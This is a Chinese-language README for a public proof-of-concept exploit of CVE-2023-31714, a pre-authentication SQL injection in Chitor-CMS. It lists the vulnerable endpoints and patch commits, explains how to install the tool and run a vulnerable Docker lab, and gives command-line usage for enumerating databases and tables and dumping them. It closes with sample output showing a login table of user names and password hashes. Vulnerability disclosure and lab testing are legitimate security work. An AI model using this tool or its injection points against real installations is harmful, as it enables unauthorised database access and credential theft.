CVE-2023-31714 - Chitor-CMS < 1.1.2 预认证 SQL 注入
发现者:msd0pe
https://github.com/waqaskanju/Chitor-CMS
项目作者:waqaskanju
chitor1.1.py(自 69d3442 提交起已修补)
2023/04/13
在 /edit_school.php?id= 端点中发现了 SQL 注入,且无需任何身份验证。
chitor1.0.py(自 5f76192 提交起变为认证后 SQL 注入)
2023/04/09
在多个端点(例如 /add_school_class.php?school=)中发现了 SQL 注入,且无需任何身份验证。自 5f76192 提交起,这些端点会验证登录用户是否具有编辑权限。这一检查之前也已存在,但并未生效。
安装
sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/cve-2023-31714
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable
启动易受攻击的 Docker:
- sudo ./run.sh [1.0|1.1]
停止并清理 Docker:
- sudo ./clean.sh
使用方法
用法:python chitor1.1.py [选项]
选项:
--version 显示程序版本号并退出
-h, --help 显示此帮助信息并退出
-u URL, --url=URL 目标 URL
--dbs 列出数据库
-D DATABASE, --db=DATABASE
选择一个数据库
--tables 列出表
-T TABLE, --table=TABLE
选择一个表
--dump 导出内容
示例:
python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
Chitor-CMS < 1.1.2 预认证 SQL 注入。
源代码由 msd0pe 置于公共领域,无版权。
任何恶意或非法活动都有可能受到法律制裁。
使用风险自负。
示例
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name | Password | Status |
+----+-------------+------------+----------------------------------+--------+
| 1 | 1 | Guest | adb831a7fdd83dd1e2a309ce7591dff8 | 1 |
| 2 | 2 | waqaskanju | ################################ | 1 |
| 3 | 3 | admin | 21232f297a57a5a743894a0e4a801fc3 | 1 |
+----+-------------+------------+----------------------------------+--------+